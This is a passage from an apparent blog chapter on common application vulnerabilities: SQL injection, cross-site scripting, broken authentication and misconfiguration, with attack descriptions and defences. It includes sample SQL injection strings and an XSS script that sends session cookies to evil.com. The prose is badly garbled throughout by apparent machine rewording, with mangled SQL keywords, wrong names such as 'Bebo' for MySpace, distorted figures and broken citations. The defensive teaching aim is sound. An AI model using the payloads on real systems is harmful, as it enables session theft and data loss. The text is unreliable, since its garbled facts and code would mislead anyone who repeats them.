Log in Subscribe

Threat Landscape and Common Vulnerabilities

Myrick Marsh
· 11 min read
Threat Landscape and Common Vulnerabilities

# Chapter 4: Threat Landscape plus Common Vulnerabilities
Every application operates within a place full of threats – malicious actors constantly searching for weaknesses to exploit. Understanding the danger landscape is essential for defense. Inside this chapter, we'll survey the nearly all common types of app vulnerabilities and attacks seen in the wild today. We will discuss how these people work, provide practical samples of their écrasement, and introduce ideal practices to stop all of them. This will lay down the groundwork at a later time chapters, which may delve deeper directly into building security directly into the development lifecycle and specific defense.

Over the yrs, certain categories of vulnerabilities have appeared as perennial troubles, regularly appearing throughout security assessments and breach reports. Sector resources such as the OWASP Top 10 (for web applications) and CWE Top twenty five (common weaknesses enumeration) list these common suspects. Let's explore some of the major ones:

## Injection Attacks (SQL, Command Injection, etc. )
- **Description**: Injection flaws happen when an software takes untrusted insight (often from a great user) and passes it into a good interpreter or command in a way that alters the intended execution. The classic example is SQL Injection (SQLi) – where user input is concatenated into an SQL query without correct sanitization, allowing you utilize their own SQL commands. Similarly, Command Injection involves injecting OS commands, LDAP Injection into LDAP queries, NoSQL Injections in NoSQL sources, and so on. Essentially, the application neglects to distinguish info from code guidelines.

- **How this works**: Consider the simple login type that takes the account information. If the server-side code naively constructs a question like: `SELECT * THROUGH users WHERE login name = 'alice' IN ADDITION TO password = 'mypassword'; `, an attacker can input something like `username: alice' OR '1'='1` and `password: anything`. The cake you produced SQL would end up being: `SELECT * COMING FROM users WHERE login = 'alice' OR '1'='1' AND security password = 'anything'; `. The `'1'='1'` issue always true could make the problem return all users, effectively bypassing the particular password check. This particular is a standard example of SQL injection to force a login.
More maliciously, an attacker may terminate the problem and add `; DECLINE TABLE users; --` to delete the users table (a destructive attack in integrity) or `; SELECT credit_card BY users; --` to dump sensitive files (a confidentiality breach).
- **Real-world impact**: SQL injection features been behind a few of the largest data removes on record. All of us mentioned the Heartland Payment Systems break – in 2008, attackers exploited a great SQL injection inside a web application to be able to ultimately penetrate inner systems and steal millions of credit score card numbers​
TWINGATE. COM
. Another situation: the TalkTalk 2015 breach in britain, exactly where a teenager employed SQL injection to reach the personal files of over a hundred and fifty, 000 customers. The subsequent investigation uncovered TalkTalk had still left an obsolete web page with a recognized SQLi flaw on the internet, and hadn't patched a database susceptability from 2012​
ICO. ORG. UK

ICO. ORG. UNITED KINGDOM
. TalkTalk's CEO defined it as the basic cyberattack; certainly, SQLi was well-understood for a 10 years, yet the company's failure to sanitize inputs and revise software triggered a serious incident – they were fined and suffered reputational loss.
These illustrations show injection episodes can compromise confidentiality (steal data), integrity (modify or erase data), and availableness (if data is wiped, service is disrupted). Even nowadays, injection remains a new common attack vector. In fact, OWASP's 2021 Top Five still lists Shot (including SQL, NoSQL, command injection, etc. ) like a top rated risk (category A03: 2021)​
IMPERVA. APRESENTANDO
.
- **Defense**: The primary defense in opposition to injection is input validation and output escaping – ensure that any untrusted info is treated as pure data, in no way as code. Using prepared statements (parameterized queries) with bound variables is some sort of gold standard intended for SQL: it sets apart the SQL signal from the data principles, so even when an user goes in a weird thread, it won't split the query composition. For example, using a parameterized query within Java with JDBC, the previous get access query would end up being `SELECT * THROUGH users WHERE login name =? AND username and password =? `, and even the `? ` placeholders are sure to user inputs safely and securely (so `' OR '1'='1` would end up being treated literally while an username, which usually won't match just about any real username, instead than part of SQL logic). Similar approaches exist intended for other interpreters.
About top of of which, whitelisting input acceptance can restrict just what characters or file format is allowed (e. g., an user name may be restricted to alphanumeric), stopping several injection payloads at the front door​
IMPERVA. COM
. Likewise, encoding output effectively (e. g. CODE encoding to stop script injection) is usually key, which we'll cover under XSS.
Developers should in no way directly include uncooked input in commands. Secure frameworks and ORM (Object-Relational Mapping) tools help by simply handling the query building for you. Finally, least privilege helps mitigate effects: the database bank account used by the particular app should have only necessary rights – e. h. it may not have got DROP TABLE rights if not necessary, to prevent the injection from undertaking irreparable harm.

## Cross-Site Scripting (XSS)
- **Description**: Cross-Site Scripting identifies some sort of class of weaknesses where an software includes malicious scripts within the context of a trusted web site. Unlike injection in to a server, XSS is about inserting in to the content that other users see, generally within a web web page, causing victim users' browsers to execute attacker-supplied script. Right now there are a couple of types of XSS: Stored XSS (the malicious script is usually stored on the particular server, e. g. in a database, plus served to additional users), Reflected XSS (the script is usually reflected from the storage space immediately in the response, often with a search query or mistake message), and DOM-based XSS (the weeknesses is in client-side JavaScript that insecurely manipulates the DOM).

- **How this works**: Imagine a communication board where consumers can post remarks. If the app does not sanitize HTML tags in comments, an attacker may post a comment like: ` var i=new Image(); i. src="http://evil.com/steal?cookie="+document.cookie; `. Any user who views of which comment will inadvertently run the software in their internet browser. The script above would send the user's session biscuit to the attacker's server (stealing their session, hence allowing the attacker to impersonate them upon the site – a confidentiality and integrity breach).
In the reflected XSS circumstance, maybe the internet site shows your type on an error webpage: should you pass a new script in typically the URL as well as the web-site echoes it, this will execute in the browser of whoever clicked that malevolent link.
Essentially, XSS turns the victim's browser into a great unwitting accomplice.
- **Real-world impact**: XSS can be quite serious, especially about highly trusted websites (like great example of such, web mail, banking portals). A new famous early instance was the Samy worm on Bebo in 2005. A user named Samy learned a stored XSS vulnerability in Facebook or myspace profiles. He created a worm: the script that, whenever any user viewed his profile, that would add him or her as a good friend and copy the particular script to the particular viewer's own account. Like that, anyone different viewing their profile got infected as well. Within just thirty hours of release, over one zillion users' profiles got run the worm's payload, making Samy one of the fastest-spreading viruses of time​
DURANTE. WIKIPEDIA. ORG
. The particular worm itself just displayed the expression "but most involving all, Samy is definitely my hero" on profiles, a fairly harmless prank​
DURANTE. WIKIPEDIA. ORG
. However, it was a wake-up call: if a great XSS worm could add friends, this could just mainly because quickly create stolen non-public messages, spread junk mail, or done other malicious actions about behalf of users. Samy faced legitimate consequences for this stunt​
EN. WIKIPEDIA. ORG
.
In an additional scenario, XSS could be used to be able to hijack accounts: regarding instance, a mirrored XSS in the bank's site might be exploited via a scam email that tips an user into clicking an URL, which then executes a script to be able to transfer funds or even steal session bridal party.
XSS vulnerabilities need been present in internet sites like Twitter, Fb (early days), and even countless others – bug bounty applications commonly receive XSS reports. Although many XSS bugs are involving moderate severity (defaced UI, etc. ), some may be critical if they permit administrative account takeover or deliver spyware and adware to users.
rapid **Defense**: The foundation of XSS defense is output encoding. Any user-supplied content that is displayed in a page have to be properly escaped/encoded so that this should not be interpreted because active script. For example, if a consumer writes ` bad() ` in a comment, the server have to store it after which output it because `< script> bad()< /script> ` so that it comes up as harmless textual content, not as a great actual script. Modern web frameworks generally provide template search engines that automatically break free variables, which stops most reflected or perhaps stored XSS by simply default.
Another important defense is Written content Security Policy (CSP) – a header that instructs web browsers to only execute intrigue from certain sources. A well-configured CSP can mitigate typically the impact of XSS by blocking in-line scripts or external scripts that aren't explicitly allowed, although CSP could be complicated to set finished without affecting blog functionality.
For developers, it's also important in order to avoid practices like dynamically constructing HTML CODE with raw data or using `eval()` on user input in JavaScript. Internet applications can also sanitize input to be able to strip out banned tags or characteristics (though this is challenging to get perfect). In summary: confirm and sanitize any HTML or JavaScript inputs, use context-appropriate escaping (HTML get away for HTML information, JavaScript escape regarding data injected into scripts, etc. ), and consider permitting browser-side defenses want CSP.

## Busted Authentication and Treatment Administration
- **Description**: These vulnerabilities entail weaknesses in just how users authenticate in order to the application or even maintain their authenticated session. "Broken authentication" can mean a number of issues: allowing fragile passwords, not avoiding brute force, faltering to implement suitable multi-factor authentication, or exposing session IDs. "Session management" will be closely related – once an customer is logged found in, the app typically uses a period cookie or expression to consider them; if that mechanism is usually flawed (e. grams. predictable session IDs, not expiring classes, not securing the cookie), attackers might hijack other users' sessions.

- **How it works**: One common example will be websites that made overly simple security password requirements or acquired no protection against trying many account details. Attackers exploit this kind of by using credential stuffing (trying username/password pairs leaked from all other sites) or brute force (trying numerous combinations). If there are no lockouts or even rate limits, a great attacker can methodically guess credentials.
An additional example: if a great application's session sandwich (the piece of data that identifies some sort of logged-in session) is not marked together with the Secure flag (so it's sent more than HTTP as properly as HTTPS) or not marked HttpOnly (so it can easily be accessible in order to scripts), it could be lost via network sniffing at or XSS. As soon as an attacker provides a valid treatment token (say, thieved from an inferior Wi-Fi or by way of an XSS attack), they can impersonate of which user without requiring credentials.
There have also been logic flaws where, with regard to instance, the pass word reset functionality is usually weak – probably it's prone to a great attack where a great attacker can reset to zero someone else's username and password by modifying details (this crosses in to insecure direct thing references / access control too).
General, broken authentication features anything that permits an attacker to be able to either gain qualifications illicitly or bypass the login using some flaw.
instructions **Real-world impact**: We've all seen news of massive "credential dumps" – enormous amounts of username/password sets floating around by past breaches. Attackers take these plus try them on other services (because lots of people reuse passwords). This automated credential stuffing has led to compromises involving high-profile accounts about various platforms.
A good example of broken auth was your case in this year where LinkedIn endured a breach and 6. 5 thousand password hashes (unsalted SHA-1) were leaked​
NEWS. SOPHOS. POSSUINDO

NEWS. SOPHOS. APRESENTANDO
. The fragile hashing meant attackers cracked most associated with those passwords within hours​
NEWS. SOPHOS. COM

REPORTS. SOPHOS. COM
. Even worse, a few yrs later it switched out the break was actually a great deal larger (over a hundred million accounts). Men and women often reuse accounts, so that break the rules of had ripple outcomes across other sites. LinkedIn's failing was initially in cryptography (they didn't salt or perhaps use a solid hash), which will be part of protecting authentication data.
Another common incident type: session hijacking. For case, before most sites adopted HTTPS everywhere, attackers about the same network (like a Wi-Fi) could sniff pastries and impersonate consumers – a threat popularized with the Firesheep tool in 2010, which in turn let anyone eavesdrop on unencrypted classes for sites like Facebook. This made web services in order to encrypt entire sessions, not just login pages.
There are also cases of problematic multi-factor authentication implementations or login bypasses due to logic errors (e. gary the gadget guy., an API that returns different messages for valid as opposed to invalid usernames can allow an assailant to enumerate consumers, or perhaps a poorly executed "remember me" symbol that's easy to be able to forge). The outcomes associated with broken authentication will be severe: unauthorized entry to user balances, data breaches, id theft, or unauthorized transactions.


- **Defense**: Protecting authentication requires a multi-pronged approach:
-- Enforce strong password policies but within reason. Current NIST guidelines recommend permitting users to choose long passwords (up to 64 chars) rather than requiring frequent changes unless there's indication of compromise​
JUMPCLOUD. COM

AUDITBOARD. COM
. Alternatively, check passwords in opposition to known breached password lists (to disallow "P@ssw0rd" and the like). Also encourage passphrases which are easier to remember but hard to guess.
- Implement multi-factor authentication (MFA). The password alone is often too few these kinds of days; providing an option (or requirement) for any second factor, like an one-time code or even a push notification, significantly reduces the hazard of account endanger even if account details leak. Many key breaches could have been mitigated simply by MFA.
- Safe the session bridal party. Use  owasp top 10  on snacks so they are usually only sent more than HTTPS, HttpOnly therefore they aren't attainable via JavaScript (mitigating some XSS impact), and consider SameSite to prevent all of them from being sent in CSRF attacks (more on CSRF later). Make treatment IDs long, random, and unpredictable (to prevent guessing).
- Avoid exposing session IDs in Web addresses, because they could be logged or leaked via referer headers. Always prefer snacks or authorization headers.
- Implement account lockout or throttling for login efforts. After say five to ten failed attempts, both lock the be the cause of a period or even increasingly delay reactions. Also use CAPTCHAs or other mechanisms if automated attempts are detected. However, end up being mindful of denial-of-service – some web pages opt for smoother throttling to steer clear of letting attackers secure out users simply by trying bad accounts repeatedly.
- Treatment timeout and logout: Expire sessions following a reasonable period of inactivity, and totally invalidate session tokens on logout. It's surprising how some apps in the past didn't appropriately invalidate server-side period records on logout, allowing tokens to become re-used.
- Focus on forgot password goes. Use secure as well or links via email, don't reveal whether an end user exists or not (to prevent consumer enumeration), and guarantee those tokens expire quickly.
Modern frames often handle the lot of this particular for you personally, but misconfigurations are common (e. grams., a developer might accidentally disable the security feature). Standard audits and assessments (like using OWASP ZAP or additional tools) can capture issues like absent secure flags or weak password procedures.
Lastly, monitor authentication events. Unusual habits (like just one IP trying a large number of user names, or one bank account experiencing a huge selection of failed logins) should boost alarms. This overlaps with intrusion detection.
To emphasize, OWASP's 2021 list cell phone calls this category Identity and Authentication Disappointments (formerly "Broken Authentication") and highlights the importance of such things as MFA, not making use of default credentials, plus implementing proper pass word handling​
IMPERVA. COM
. They note of which 90% of programs tested had challenges in this area in several form, which is quite scary.


## Security Misconfiguration
- **Description**: Misconfiguration isn't just one susceptability per se, although a broad school of mistakes inside configuring the software or its environment that lead to insecurity. This can involve using default credentials or configurations, leaving unnecessary benefits enabled, misconfiguring safety headers, or not hardening the server. Fundamentally, the software may be secure in principle, but the way it's deployed or configured opens a hole.

- **How it works**: Examples regarding misconfiguration:
- Leaving default admin accounts/passwords active. Many software program packages or equipment historically shipped with well-known defaults